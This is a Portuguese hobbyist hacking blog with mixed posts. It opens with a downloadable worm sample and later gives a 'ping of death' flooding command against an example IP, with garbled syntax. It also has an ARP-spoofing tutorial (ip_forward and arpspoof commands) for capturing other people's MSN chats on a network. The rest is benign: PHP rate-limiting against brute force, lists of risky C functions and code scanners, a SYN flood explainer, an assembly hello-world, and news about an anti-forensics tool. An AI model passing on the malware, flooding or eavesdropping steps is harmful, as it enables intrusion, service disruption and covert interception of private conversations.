2. Se não sabem o que fazem, devem de parar por aqui. Não digam que não avisei.

Tanto este Blog, como o seu Administrador Pirata Da Faja, não nos responsabilizamos por estragos efectuados a terceiros. Utilizem por vosso próprio risco.

(Este vírus estão para descarga como um exemplo e devem ser vistos como elemento didáctico para este blog)

Download
Pass: auToeXeCw0rm

Proteja-se contra brute-forces

0 coments
Um tipo de ataque que pode causar uma paragem bruta do PHP (e um possível DDoS) é uma “chuva” de submits, talvez uma tentativa de brute-force onde um (ou mais) formulário é preenchido e enviado várias vezes consecutivas na tentativa de derrubar o servidor ou só descobrir uma senha.

Isso acontece, dependendo do servidor e das configurações do mesmo, o PHP não vai conseguir dar conta de tantas requisições, vai ficar perdido e vai parar… Há possibilidade de evitar este tipo de “ataque” fazendo alguns ajustes no servidor e instalando alguns mods do Apache… Mas há também como proteger em-se disso directamente no PHP, e é disso que vou falar hoje.

Antes de tudo vamos falar de algo óbvio, mas que pouca gente deve ter percebido: a variável global $_POST existe sempre… Independente se houve ou não um submit antes. Quando estão a navegar pelo site o $_POST (que é um array) vai ser sempre vazio, sem elementos, e quando houverem dados para o PHP processar (depois de um submit) vai passar a ser um array com elementos.

Então, no começo do nosso script, precisamos verificar se há algum valor dentro de $_POST, se ele não está vazio:

// Verifica se $_POST não está vazio
if (!empty($_POST)) {
// :]
}

?>


Agora que já sabemos quando houve um submit, vamos verificar se existe um valor salvo na sessão que nos informará a hora exacta do último submit aceite pelo sistema (em UNIX TIMESTAMP)… Por questão de optimização de código também vamos colocar, directo no mesmo IF, uma verificação que compara esse horário procurando na sessão (caso ele exista) com o horário actual… Vamos directo ao script para ser mais fácil de entender:

// Verifica se $_POST não está vazio
if (!empty($_POST)) {
$segundos = 10; // Tempo mínimo entre dois submits (em segundos)
$agora = time(); // "Agora" em UNIXTIMESTAMP

// Verifica se a variável da sessão existe E verifica a diferença de tempo
if (isset($_SESSION['ultimoSubmit']) AND ($_SESSION['ultimoSubmit'] > ($agora - $segundos))) {
// O submit será bloqueado
}
}

?>
 
Viram? Caso o IF seja verdadeiro vamos bloquear o submit com um echo e um exit (podem ainda redirecionar o visitante para outro local, ou fazer da forma como preferirem)… E caso o IF seja falso o script continuará normalmente…

// Verifica se $_POST não está vazio
if (!empty($_POST)) {
$segundos = 10; // Tempo mínimo entre dois submits (em segundos)
$agora = time(); // "Agora" em UNIXTIMESTAMP

// Verifica se a variável da sessão existe E verifica a diferença de tempo
if (isset($_SESSION['ultimoSubmit']) AND ($_SESSION['ultimoSubmit'] > ($agora - $segundos))) {
// O submit será bloqueado
echo "Aguarde mais de {$segundos} segundos para enviar o formulário!";
exit;
}
// Salva a hora do último submit
$_SESSION['ultimoSubmit'] = $agora;
}

?>
 
Prestem atenção nas linhas marcadas…
Nas linhas 11 e 12 será onde ocorre o bloqueio em si e na linha 15 onde salvamos o horário do último submit caso ele seja aceite.

Caso pretenderem bloquear todas as tentativas de submit que não tenham $segundos entre si, necessitam de salvar o horário do ultimo submit mesmo quando bloquear a tentativa, da seguinte forma:
 
// Verifica se a variável da sessão existe E verifica a diferença de tempo
if (isset($_SESSION['ultimoSubmit']) AND ($_SESSION['ultimoSubmit'] > ($agora - $segundos))) {
// O submit será bloqueado
$_SESSION['ultimoSubmit'] = $agora;
echo "Aguarde mais de {$segundos} segundos para enviar o formulário!";
exit;
}
 
Atenção: Esse script não vos protege totalmente contra ataques brute-force ou DDoS, apenas AJUDA a
evitar que isso aconteça.

Cumprimentos
Pirata Da Fajã

Como encontrar vulnerabilidades nos meus programas...

0 coments

Todo programa é vulnerável a alguma falha!

Vou citar aqui algumas das falhas mais comuns de hoje em dia…

Buffer overflow: gets (), a função scanf (), sprintf (), strcat (), strcpy ()

Formato string vulnerabilidades: printf (), fprintf (), vprintf (), snprintf (), vsnprintf (), o syslog ()

Race conditions: acesso (), chown (), chgrp (), chmod (), o mktemp (), tempnam (), tmpfile (), tmpnam ()

Número aleatório vulnerabilidades aquisição: rand (), random ()

Estas são somente algumas das falhas mais famosas que programadores na hora que estão criando seus programas, cometem, Porem não podemos culpar os programadores até porque todos nós somos humanos, ninguém é perfeito...

vou diser aqui alguns programas de "scan" de vulnerabilidades.

Alguns programas não fazem"scan" a vulnerabilidades de programas feitos por si mesmo ou por outras pessoas, porem tens que encontrar uma vulnerabilidade de tua autoria.. Código Fonte a vulnerabilidades de segurança irá variar entre linguagens e plataformas.

Itens para procurar em C código incluem:

Shell metacharacter vulnerabilidades: exec (), popen (), system ()

ALGUNS DOS PROGRAMAS MAIS UTILIZADOS QUE AJUDAM A DESCOBRIR FALHAS…

Flawfinder 1.27

Este é um programa que analisa o código fonte e relatórios possíveis a deficiências de segurança(falha), ordenadas por nível de risco. É muito útil para encontrar e remover rapidamente, pelo menos, alguns potenciais problemas de segurança antes de um programa amplamente divulgado ao publico.(para Linux)

RATAS da Secure Software Solutions

faz "scan" C, C + +, Perl, PHP e Python o código fonte para potenciais vulnerabilidades de segurança.

ITS4 de Cigital:

faz um scan ao código fonte procurando potencialmente vulneráveis função chamadas e pré código fonte análise para determinar o nível de risco.

PScan: Um pequeno problema scanner para arquivos de origem C. Peak quantification using Statistical Comparative ANalysis

BOON: Buffer Overrun detecção. BOON é uma ferramenta para a saturação do buffer, e automaticamente encontra vulnerabilidades em código fonte C. Saturações de buffer são um dos tipos mais comuns de falhas de segurança.

MOPS: Programas de Segurança MOdelchecking propriedades. MOPS é uma ferramenta para encontrar bugs de segurança e de programas em C para verificar a conformidade com as regras de programação defensiva.

Cqual: Uma ferramenta para a inclusão de tipo qualificativas para C. cqual digitado é baseado em uma ferramenta de análise para encontrar bugs em programas C.

MC: Meta-Nível Compilação

SLAM: Microsoft

ESC/Java2: Extensão Static. Verificado para Java

Splint: Programação Segura Lint. Splint é uma ferramenta para verificar estaticamente programas C de vulnerabilidades de segurança e codificação erros.

Ciclomotor: Um Modelo-Verificador de Pushdown Sistemas

JCAVE: JavaCard applet Verificação Ambiente

Toolkit Boop: Utiliza captação e requinte para determinar a acessibilidade de pontos no programa um programa C . É uma ferramenta baseada no modelo verificando os algoritmos do SLAM toolkit para um subconjunto da linguagem de programação Externas C .

Blast: Berkeley Software Lazy Abstraction Verificação Ferramenta

Uno: Simples ferramenta para análise de código fonte

PMD: Scans ao Java de código fonte e olha para os potenciais problemas

C + + Teste: Unidade de ensaio e ferramenta de análise estática


Cumprimentos,

Pirata Da Faja

Backtrack 4

0 coments


Boas pessoal chegou o novo BackTrack4, é sem dúvida uma ferramenta essencial para quem "ama" segurança como eu...
È um sistema operativo com centenas de aplicativos, é grátis e 100% fiavel :)

"

Back | Track é o TOP das distribuições GNU / Linux live / com sua instalação e compilação focada na área de segurança da informação, como avaliação e testes de penetração em sistemas. Distribuição com foco em testes de seguranças e pen tests (testes de penetração), muito apreciada por hackers e criada pelos mesmos, pode ser iniciada diretamente pelo CD ou midia removivel sem necessidade de instalar em disco. É altamente indicada, para Pentesters, Testers, Analistas em Segurança, Administradores de Redes, Auditores e outros profissionais que se preocupam, valorizam e protegem a Segurança das Empresas. Em poucos segundos, você vai ter um sistema completo pronto para o seu trabalho.

Foi evoluído da combinação de duas distribuições bem difundidas - Whax e Auditor Security Collection. Juntando forças e substituindo essas distribuições, BackTrack ganhou uma popularidade massiva e foi eleito em 2006 como a Distribuição Live de Segurança número 1 em sua categoria, e 32º no geral, pela Insecure.org. Profissionais de segurança, assim como novatos, estão usando BackTrack como seu kit de ferramentas favorito pelo mundo todo.

BackTrack tem uma longa história e foi baseado em várias distribuições de Linux diferentes até agora ser baseado em uma distribuição Linux Slackware e os scripts do live CD correspondentes por Tomas M. (www.slax.org). Cada pacote, configuração de kernel e script é otimizado para ser utilizado pelos testadores de penetração de segurança. Patches e automação têm sido adicionados, aplicados e desenvolvidos para oferecer um ambiente organizado e pronto para a viagem.

Após ter chegado em um procedimento de desenvolvimento estável durante os últimos lançamentos, e consolidando feedbacks e complementos, o time focou-se em dar suporte a mais dispositivos de hardware, e novos dispositivos, bem como oferecer mais flexibilidade e modularidade por meio da reestruturação de processos de construção e manutenção. Com a atual versão, a maioria das aplicações são construídas como módulos individuais que ajudam a acelerar os lançamentos de manutenção e correções.

Por Metasploit ser uma das ferramentas-chave para a maioria dos analistas, ele é estreitamente integrado no BackTrack e ambos os projetos colaboram juntos para sempre providenciar uma implementação detalhada do Metasploit dentro das imagens do CD-Rom do BackTrack ou nas futuras imagens de virtualização mantidas e distribuições da remote-exploit.org (como aplicações de imagens VMWare).

Ser superior e fácil de usar é a chave para um bom Live-CD de segurança. Pega-se coisas um passo adiante e alinha o BackTrack às metodologias de teste de penetração e frameworks de avaliação (ISSAF e OSSTMM). Isso irá ajudar nossos usuários profissionais durante seus pesadelos de relatório diário.

Atualmente BackTrack consiste de mais de 300 ferramentas prontas, diferentes e atualizadas, que são logicamente estruturadas de acordo com o fluxo de trabalho de profissionais de segurança. Essa estrutura permite até novatos encontrar as ferramentas relacionadas a uma tarefa específica para ser cumprida. Novas tecnologias e técnicas de teste são combinadas no BackTrack o mais rápido possível para mantê-lo atualizado.

Nenhuma plataforma de análise comercial ou livremente disponível oferece um nível equivalente de usabilidade com configuração automática e foco em testes de penetração.

Nascido a partir da fusão entre históricos e Auditor e Whax inicialmente baseada Slax, a libertação número 4 codinome pwnsauce a distribuição adota um sistema baseado no Debian e Ubuntu (8.10 i386 32 bits) com o seu próprio repositório, oferecendo uma vasta gama software gerenciável através do Gestor de pacotes APT"

Fonte: BackTrack


explicação "Ping Of Death"

0 coments
Explicação do "ping da morte"

O que é o ping da morte?

Ping da morte é um comando usado pelo protocolo icmp. Porem esse comando ping foi criado para testar a rede. Entretanto hackers começaram a usa-lo para o mal...

O comando ping envia 4 pacotes de 32 bytes para um destino.
E este comando serve para verificar a conectividade de uma rede e até mesmo na Internet.

Para testar uma conectividade de um computador ou site, servidor… Entre no prompt command e digite: ping
Os pacotes serão enviados e recebidos e o sistema retornará uma resposta:
estatísticas do ping: pacotes enviados= 4 recebidos = 4 perdidos = 0 (0% de perda)

Mas estes pacotes não fazem mal algum, pois são pequenos de mais para afectar algum sistema(32 bytes), e são só 4 pacotes.

Imagine se fossem 65500 bytes!

A placa de rede teria sérios problemas, ao responder tudo isso, gerando lentidão e até um "crash" do servidor. Agora, observem a facilidade do comando.

ping -l- 65500 -t

Substitua o destino pelo nome ou IP do computador (por exemplo):

ping -l- 65500 -t 200.200.200.200
ou
ping -l- 65500 -t

Muitas pessoas usam este ataque, pois é um ataque simples de fazer e pode se fazer de qualquer maquina, pois não precisa de programas para fazer esse ataque.
abrem a janela “PROMPT COMMAND” diversas vezes, enviando diversos pacotes seguidos para o IP da vítima, que acaba sofrendo com o "travamento" da placa, que não consegue processar tanta informação seguida.

Para entenderes o parâmetro do comando, basta digitalizar no prompt command o comando: PING
e aparecerá a ajuda do protocolo ping.
mas, vou explicar este parametro,”ping -l- 90000 -t 200.201.10.27″.

$ o ping envia pacotes;
$a opção “-L-” determina o tamanho dos pacotes (máximo de 65500 bytes)
$a opção “-T” determina que o comando deve ser executado até o usuário cancelar (pode ser cancelado pressionando “CTRL + C”);

Pessoal este é um ataque muito antigo, um bom servidor já está protegido contra este tipo de ataque, mas nunca se esqueçam, NADA É SEGURO :)

Cumprimentos,
Pirata Da Fajã

capturar conversas do msn com dsniff

2 coments
Usando msn shadow e dsniff para capturar conversas de msn, icq etc…

Lógica do sniffing para capturar conversar em rede:

Tem alguém na sua rede, conversando no msn com outra pessoa, daí usas o arpspoof para avisar todos computadores da rede, que o seu computador está como servidor, Sendo assim, tudo que entrar ou sair da rede terá que passar pelo seu computador(tipo um proxy transparente).

Daí, entra a tarefa do msn shadow que capturará todas as conversas.

Vamos la, para entenderes melhor o tutorial…

A ferramenta MSN Shadow possui a função de capturar as mensagens instantâneas que "trafica" pela rede com protocolos como MSN, Yahoo messenger, jabber. A ferramenta pode ser usada tanto com rede sem fio como em rede com fio, bastante simples de seleccionar a interface de rede na qual encontra-se ligado.

O MSN Shadow permite visualizar em tempo real as mensagens instantâneas que "traficam pela rede, e também existe a possibilidade de capturar as conversas que ocorrem por meio de vídeo conferencia podendo ser salvo em formato de vídeo.

Para que o ataque seja realizado com sucesso, primeiro devemos activar o encaminhamento de pacotes IP para que o tráfego da rede chegue aos destinos predefinidos.

O dsnif auxilia o MSN Shadow na captura dos pacotes com a ferramenta arpspoof. O arpspoof é executado contra o gateway da rede, fazendo com que todos os pacotes tenham que passar primeiro pela maquina do investigador, fazendo isso todo o tráfego da rede passa primeiro pela maquina que está sendo executado o MSN Shadow.

Activação do encaminhamento de pacotes IP:

#echo 1 > /proc/sys/net/ipv4/ip_forward

Execução do comando arpspoof que enviará pacotes de broadcast, avisando toda a rede que os ip’s possuem o endereço Mac da maquina atacante:

#arpspoof [endereco Ip do gateway]

#arpspoof [endereco IP da vitima]

OBS: se vocês acharem muito complicado podem usar o Wireshark que é muito mais sinples e funciona em linux e windows

Cumprimentos,
Pirata da Faja

Programar em Assembly

0 coments
Este é um programa simples, para os iniciantes aprenderem como é feito um programa em Assembly. Não tão complicado como tem em outros sites, vou ensinar a criar o programa. Código por código, para vocês realmente aprenderem.

Vamos lá…

Para criar um programa que imprimirá na tela a mensagem Ola mundo,

Primeiramente tens que arrumar uma tabela ASCII em mãos.

E para quem não sabe nem o que é uma tabela ASCII, pesquise o que é neste momento e depois volte a ler este tutorial de escrita de um programa em assembly. (google é nosso amigo) :)

Vou passar, somente os códigos ASCII da mensagem "alo mundo".

CODIGO E LETRA

41 – A

6C – L

6F – O

20 - //ESPACO

6D – M

75 – U

6E – N

64 – D

6F – O

21 – !

24 – $

Para criar este programa, vou usar o programa proprio do windows chamado DEBUG(lê-se debâgui).

Para encontralo, entre no prompt (cmd) do windows de digite: debug

Assim entras no programa...

Agora é preciso colocar os códigos do string na memória.

A função: E

É para informar endereços de deslocamento

A função: A

É para "assemblar", colocar como ponto inicial de deslocamento

A função: mov

Serve para mover

A função: int

Serve para interronper

Agora vamos la….

Entre no programa debug

Informe o endereço de deslocamento a partir de 0200. e informe cada byte da tabela anterior separando-os por espaços em branco. Ficaria assim:

E 0200 41 6C 6F 20 6D 75 6E 64 6F 21 24

Neste caso é necessário informar para o registador geral DX o endereço de deslocamento em que encontra se na a sequência de caracteres. Neste caso, o endereço é 0200. É necessário também definir o valor hexadecimal 09 no registar mais significativo AH, para que um string seja impresso. Execute o comando A 0100.

Ficaria assim:

A 0100

0D0B:0100 MOV AH,09

0D0B:0102 MOV DX,0200

0D0B:0105 MOV INT 21

0D0B:0107 MOV INT 20

0D0B:0109

Obs: quando digitar a penultima linha que é MOV INT 20, é preciso dar dois enter.

O endereço 0D0B, no seu computador pode não ser o mesmo. ISTO E NORMAL!

O CODIGO 09 serve para imprimir uma sequência de caracteres na tela. Se quiseres imprimir somente um caracter, basta colocar no lugar de 09 o c

código 02.

Digite o comando G para que a mensagem seja apresentada.

-G

Alo mundo!

O programa terminou de forma normal

Ai esta o seu programa em assembly

Caso acha esse programa muito difícil de fazer, Então basta fazer o seguinte:

Entre no programa debug e digite:

E 0200 “ALO MUNDO” 24

Programa feito.

Digite: G



——————————————————————-

Caso você queira salvar este programa, basta digitar na linha de comando o debug:

N nomeprograma.com

Depois digitar:

W

Já que estou falando sobre assembly já vou falar a diferença entre assembler e assembly.

Muitas pessoas l confundem as palavras, pois não sabem do que falam.

Assembly é uma linguagem de programação! Não é uma linguagem de maquina, porem é quase isso.

Assembler é um mero compilador de programas assembly.

Cumprimentos,
Miguel Melo Pereira,
conhecimento não é crime :)

Ataque SYN flood

0 coments

SYN flood ou ataque SYN é uma forma de ataque de negação de serviço (também conhecido como Denial of Service – DoS) em sistemas computadorizados, na qual o atacante envia uma seqüência de requisições SYN para um sistema-alvo.

Quando um cliente tenta começar uma conexão TCP com um servidor, o cliente e o servidor trocam um série de mensagens, que normalmente são assim:

  • O cliente requisita uma conexão enviando um SYN (synchronize) ao servidor.
  • O servidor confirma esta requisição mandando um SYN-ACK(acknowledge) de volta ao cliente.
  • O cliente por sua vez responde com um ACK, e a conexão está estabelecida.

Isto é o chamado aperto de mão em três etapas (Three-Way Handshake).


Um cliente malicioso pode não mandar esta última mensagem ACK. O servidor irá esperar por isso por um tempo, já que um simples congestionamento de rede pode ser a causa do ACK faltante, Ou seja. O servidor ficará esperando varias respostas deixando de responder as outras requisições que são feitas por outros clientes.

Esta chamada conexão semi-aberta pode ocupar recursos no servidor ou causar prejuízos para empresas usando softwares licenciados por conexão. Pode ser possível ocupar todos os recursos da máquina, com pacotes SYN. Uma vez que todos os recursos estejam ocupados, nenhuma nova conexão (legítima ou não) pode ser feita, resultando em negação de serviço. Alguns podem funcionar mal ou até mesmo travar se ficarem sem recursos desta maneira.

Algumas contra-medidas para este ataque são os SYN cookies. Apenas máquinas Sun e Linux usam SYN cookies.

Ao contrário do que muitos pensam, não se resolve negação de serviço por Syn flood limitando conexões por minuto (como usar o módulo limit ou recent do iptables), pois as conexões excedentes seriam descartadas pelo firewall, sendo que desta forma o próprio firewall tiraria o serviço do ar. Se eu, por exemplo, limito as conecões SYN a 10/seg, um atacante precisa apenas manter uma taxa de SYNs superior a 10/s para que conexões legítimas sejam descartadas pelo firewall. O firewall tornou a tarefa do atacante ainda mais fácil. Em “Iptables protege contra SYN Flood?” tem uma boa descrição dos motivos pelos quais uma configuração de firewall não resolve.

Um ataque de Syn Flood é feito com os ips forjados (spoof), para que o atacante não receba os ACKs de suas falsas solicitações.


Cumprimentos,

Miguel Melo Pereira "Pirata da Fajã"

Ataque em ferramenta forense da Microsoft

0 coments

Os hackers lançaram um programa que, dizendo eles, pode sabotar a suíte de utilitários forenses que a Microsoft fornece gratuitamente para autoridades no mundo todo.

Conhecida como Decaf, a ferramenta lançada pelos hackers monitora sistemas com o Windows visando detectar a presença do COFEE, uma suíte com 150 utilitários usados pela polícia para a coleta de evidências digitais.

Quando um pendrive com a ferramenta da Microsoft é inserido em um computador com o Decaf, o programa dos hackers executa uma série de medidas contra ela.

A Microsoft fornece o COFEE gratuitamente para as autoridades desde 2007. O COFEE (abreviatura de Computer Online Forensic Evidence Extractor) permite a coleta de histórico de navegação, arquivos temporários e outros dados presentes nos computadores baseados em Windows. A ferramenta da Microsoft é distribuída através da Interpol.

Quando o COFEE vazou na internet em novembro de 2009, a Microsoft minimizou a possibilidade de que os hackers poderiam criar contra-medidas contra sua ferramenta.

O Decaf pode remover os logs do COFEE, desativar os drives USB e até mesmo contaminar ou simular uma grande variedade de endereços MAC (identificadores únicos de placas de rede). Futuras versões permitirão que os usuários travem remotamente os sistemas protegidos.

O Decaf pode ser encontrado em quase todos lugares da internet hoje, a partir do BitTorent.

___________________________________________________________

O que é Prática Forense?

Prática forense é a aplicação de técnicas científicas dentro de um processo legal. Essas práticas envolvem pesquisadores altamente especializados – ou criminalistas – que localizam vestígios. Mas esses vestígios só podem proporcionar provas conclusivas quando são testados em laboratório.

Como os criminosos desenvolveram vias cada vez mais criativas de driblar a lei, nossa força policial foi obrigada a descobrir maneiras mais eficientes de levar esses delinqüentes a julgamento. Mesmo que aparentemente eles não deixem pistas, os detetives(Especialistas) descobriram há algum tempo que isto não é verdade.

Fontes: discoverybrasil, baboo

IMPORTANTE

0 coments
É so para informar que o pirata da faja vai voltar a "postar" novos post, e vai criar um blog só para eventos de corridos nos açores... nao percao

brevemente..

0 coments
Pessoal, brevemente um grande blog a abrir, com muita informaão de informatica entre muitas outras cenas....

http://tigri0809.blogspot.com/

Comunicado

0 coments
Em nome do Pirata da Faja, vimos pedir desculpa pelo periodo de tempo em que o nosso blog esteve desactualizado.. Esperemos ser breves..

Winamp Pro v5.52

0 coments

Nullsoft Winamp is a fast, flexible, high-fidelity media player for Windows. Winamp supports playback of many audio (MP3, OGG, AAC, WAV, MOD, XM, S3M, IT, MIDI, etc) and video types (AVI, ASF, MPEG, NSV), custom appearances called skins (supporting both classic Winamp 1.x/2.x skins and Winamp 3 freeform skins), audio visualization and audio effect plug-ins (including two industry dominating visualization plug-ins), an advanced media library, Internet radio and TV support, CD ripping, and CD burning.

São Cipriano

1 coments
O famoso livro de São Cipriano aqui é gratuito.

Wide Wallpapers

1 coments
Conjunto magnifico de Wallpapers para personalizares o teu ambiente de trabalho.

Nokia 5300 / 5200

0 coments



Aprenda a abrir todo o seu nokia 5300 ou 5200 em menos de 10 minutos, utilizando apenas
alguns materiais básicos. Bom trabalho.
-----------------------------------------------------------------------------------

Video aula

0 coments

Video Tuturial, mostrando passo a passo como se tira riscos de um cd ou dvd apenas com uma banana e com um limpa vidros.



Download: http://w15.easy-share.com/11757281.html










_____________________________________________________________________

Notícias

1 coments

Iron Maiden no Super Bock Super Rock em 2008

"Primeira banda avançada pela promotora do festival actua no dia 9 de Julho.

Depois de muita especulação, chegou finalmente a confirmação oficial da actuação dos Iron Maiden na edição de 2008 do festival Super Bock Super Rock.

A banda britânica sobe ao palco no dia 9 de Julho (véspera do início da segunda edição do Oeiras Alive!) e torna-se assim a primeira banda confirmada no cartaz do evento, que se realiza como de habitual no Parque Tejo.

O press release da Música no Coração, promotora do SBSR, adianta que o bilhete diário para o dia em que actuam os Iron Maiden custa €40 e já se encontra à venda nos locais habituais.

O concerto insere-se na digressão mundial Somewhere Back in Time , na qual a banda liderada por Bruce Dickinson promete percorrer três décadas de carreira (dando mais ênfase aos álbuns clássicos dos anos 80).

Outras curiosidades avançadas pela promotora são o facto de a banda e os técnicos da digressão viajarem num avião Boeing 757 (decorado com imagens da mascote da banda - o esqueleto Eddie - em ambos os lados da fuselagem) pilotado pelo próprio vocalista da banda (que tem o curso de piloto comercial profissional).

O grupo traz consigo os cenários e conceitos baseados na mascote, sendo que nesta digressão o tema é o Antigo Egipto" by: Unkind.

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Tuturial youtube video

0 coments
Boas... Gostas de ver videos no Youtube?? Gostaria de fazer download desses videos para o teu pc?? Entao esta é a maneira mais simples e eficaz de faseres downloads de videos no Youtube para teu pc com o programa VideoGet.

Tuturial:



P.S- Este programa tambem da para faser downloads do Google Video, MySpace, AnimeEpisodes.net, Blennus, BestOfGoogleVideo, Glumbert, ThatVideoSite, TinyPic, PhotoBucket, MyVideo.de, ZippyVideos, entre muitos outros..

Link para download (video get) : http://w15.easy-share.com/10852781.html

---------------------------------------------------------------------------------------------




agradecimento

3 coments
Bem, quem me conhece sabe como sou, portanto nao vou estar aqui a perder tempo com aquelas tretas do tipo como sou etc, etc. Queria agradecer ás pessoas que me apoiaram para faser este mini site-blog .. Em especial queria agradecer ao mestre Barril, á Mafioza e a "Papo-seca", pois sem eles este mini site-blog nao estava ca! um abraço, e sempre que alguem precizar de alguma informação que deixe o deu e.mail e a sua duvida que prometo tentar ajudar. Obrigado

--------------------------------------------------------------------------------------------------